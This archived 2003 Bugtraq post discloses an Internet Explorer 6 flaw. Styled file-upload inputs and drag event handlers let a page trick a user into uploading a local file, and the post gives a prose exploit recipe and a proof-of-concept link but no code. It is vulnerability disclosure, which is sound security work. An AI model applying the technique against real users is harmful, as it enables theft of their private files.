IE - reading local files

From: Adam [ckkl] (ckkl@poczta.wp.pl)
Date: 03/23/03

  • Next message: Piotr Chytla: "3com RAS 1500 Remote vulnerabilities." 
    From: "Adam [ckkl]" <ckkl@poczta.wp.pl>
To: <bugtraq@securityfocus.com>
Date: Sun, 23 Mar 2003 03:10:25 +0100

    Hello,

    I don't know if anybody pointed it out before...

    While playing with IE [6.0] I found out that
    it is possible to read local files with a little
    help of user...

    How it works?
    1. IE lets you define style for the INPUT type=file tag
        including clipping region what makes possible to
        hide the "Browse..." button.

    2. IE lets you handle 3 events
        - ondragstart
        - ondrag
        - ondragend
       for misc tags like DIV, INPUT, IMG and others

    3. IE lets you change the content of the INPUT after
       the user started to drag it

    Screenplay:
    - user selects text in source INPUT
    - user starts to drag text
    - ondragstart event is fired
    - the function takes control
      and changes the content
      of the source INPUT
    - user drops the text in
      the uploading INPUT control
    - ondragend event is fired
    - function takes control and
      submits the form at once

    Exploit:
        - create the INPUT uploading control (type=file)
        - change its style to make it look innocent
          [remove border, clip the 'Browse...'button]
        - create the source INPUT control and make it
          look like an innocent text [no borders, no focus]
        - write a simple handler for drag* events
          - it will change the content of the source INPUT
           control to anything we want, f.ex.local filename
        - seduce user (f.ex. some kind of drag&drop
          JavaScript game) to select text and drag it
          into uploading control area and when
          it's done (ondragend), submit the form and this
          way send the file to the server

    Proof of concept:
    http://www.sztolnia.pl/hack/dragquIEn/dragquIEn.html

    Best Regards
    Adam Blaszczyk
    reverser, coder, writer & researcher [VX/AV]
    http://www.symantec.com (Localization Engineer)
    http://www.mykakee.com (Home page)
    Whatever I say in this e-mail is my private opinion.

  • Next message: Piotr Chytla: "3com RAS 1500 Remote vulnerabilities."
    • Quantcast